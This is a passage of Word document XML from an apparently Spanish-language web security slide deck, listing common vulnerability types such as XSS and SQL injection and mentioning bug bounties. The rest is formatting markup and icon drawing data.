          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1080" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41458FEF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1128"/>
        </w:tabs>
        <w:spacing w:before="54"/>
        <w:ind w:left="1128" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Las siguientes vulnerabilidades se tratarán en las siguientes diapositivas: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AFA29C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="387"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FE0BE6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:ind w:left="1489"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Secuencias de comandos entre sitios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B2623" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="307"/>
        <w:ind w:left="1489"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Inyección SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592CD4F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="309"/>
        <w:ind w:left="1489"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Vulnerabilidad de inyección de código</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDAFE57" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="310"/>
        <w:ind w:left="1489"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Inclusión de archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5C3F5C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="307"/>
        <w:ind w:left="1489"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Parámetros/campos del sitio web de fuerza bruta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF7964C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="309"/>
        <w:ind w:left="1489"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">− Vulnerabilidad de carga de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>archivos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314DAE56" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C25F316" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26EB3E4D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C1E95D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F226303" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="155"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353D35D8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1128"/>
        </w:tabs>
        <w:ind w:left="1128" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Todas las vulnerabilidades mencionadas anteriormente son de alta gravedad y empresas de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>renombre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>como</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>facebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>, google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08476B73" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="233"/>
        <w:ind w:left="1129"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>etc. proporcionan recompensas cuando se les revelan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F1D54C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="400" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76909920" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244F5CA2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="855"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A17E02" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356BCD52" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B09E48" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1851"/>
        </w:tabs>
        <w:spacing w:line="650" w:lineRule="exact"/>
        <w:ind w:left="1851" w:hanging="680"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explotación de la red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4DB51" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="506"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4E7DE2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1147"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1147" w:right="1610"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15813632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BE682A9" wp14:editId="152F6F8E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5641688</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1853243</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="429259" cy="427355"/>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427355"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="429259" cy="427355"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="430" name="Image 430"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId200" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="37857" y="0"/>
                            <a:ext cx="140705" cy="249376"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="431" name="Image 431"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId201" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="250493" y="0"/>
                            <a:ext cx="140705" cy="249376"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="432" name="Graphic 432"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="99498"/>
                            <a:ext cx="429259" cy="327660"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="429259" h="327660">
                                <a:moveTo>
                                  <a:pt x="403818" y="201516"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="25238" y="201516"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="15438" y="203504"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7413" y="208916"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1991" y="216925"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="226706"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="302275"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1991" y="312055"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7413" y="320065"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="15438" y="325477"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25238" y="327464"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="403818" y="327464"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413618" y="325477"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="421643" y="320065"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="427065" y="312055"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429056" y="302275"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429056" y="289680"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63096" y="289680"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="53296" y="287692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="45271" y="282280"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39849" y="274271"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37857" y="264490"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39849" y="254710"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="45271" y="246700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="53296" y="241288"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63096" y="239301"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429056" y="239301"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429056" y="226706"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="427065" y="216925"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="421643" y="208916"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413618" y="203504"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="403818" y="201516"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="429259" h="327660">
                                <a:moveTo>
                                  <a:pt x="429056" y="239301"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="63096" y="239301"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="72896" y="241288"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="80921" y="246700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="86343" y="254710"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="88335" y="264490"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="86343" y="274271"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="80921" y="282280"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="72896" y="287692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63096" y="289680"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429056" y="289680"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429056" y="277085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="182349" y="277085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="176670" y="271417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="176670" y="257563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="182349" y="251895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429056" y="251895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429056" y="239301"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="429259" h="327660">
                                <a:moveTo>
                                  <a:pt x="245445" y="251895"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="196230" y="251895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="201909" y="257563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="201909" y="271417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="196230" y="277085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="245445" y="277085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239767" y="271417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239767" y="257563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="245445" y="251895"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="429259" h="327660">
                                <a:moveTo>
                                  <a:pt x="308542" y="251895"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="259327" y="251895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="265005" y="257563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="265005" y="271417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="259327" y="277085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="308542" y="277085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="302863" y="271417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="302863" y="257563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="308542" y="251895"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="429259" h="327660">
                                <a:moveTo>
                                  <a:pt x="371639" y="251895"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="322423" y="251895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328102" y="257563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328102" y="271417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="322423" y="277085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="371639" y="277085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="365960" y="271417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="365960" y="257563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="371639" y="251895"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="429259" h="327660">
                                <a:moveTo>
                                  <a:pt x="429056" y="251895"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="385520" y="251895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="391198" y="257563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="391198" y="271417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="385520" y="277085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429056" y="277085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429056" y="251895"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="429259" h="327660">
                                <a:moveTo>
                                  <a:pt x="214528" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="204728" y="1987"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="196703" y="7399"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="191281" y="15408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189289" y="25189"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189289" y="34635"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="194337" y="42822"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="201909" y="46600"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="201909" y="201516"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="227147" y="201516"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="227147" y="46600"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="234719" y="42192"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239767" y="34005"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239767" y="25189"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="237775" y="15408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="232353" y="7399"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="224328" y="1987"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2145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5B1CD9" id="Group 429" o:spid="_x0000_s1026" style="position:absolute;margin-left:444.25pt;margin-top:145.9pt;width:33.8pt;height:33.65pt;z-index:15813632;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="429259,4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&#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">
                <v:shape id="Image 430" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:37857;width:140705;height:24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">
                  <v:imagedata r:id="rId202" o:title=""/>
                </v:shape>
                <v:shape id="Image 431" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:250493;width:140705;height:24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">
                  <v:imagedata r:id="rId203" o:title=""/>
                </v:shape>
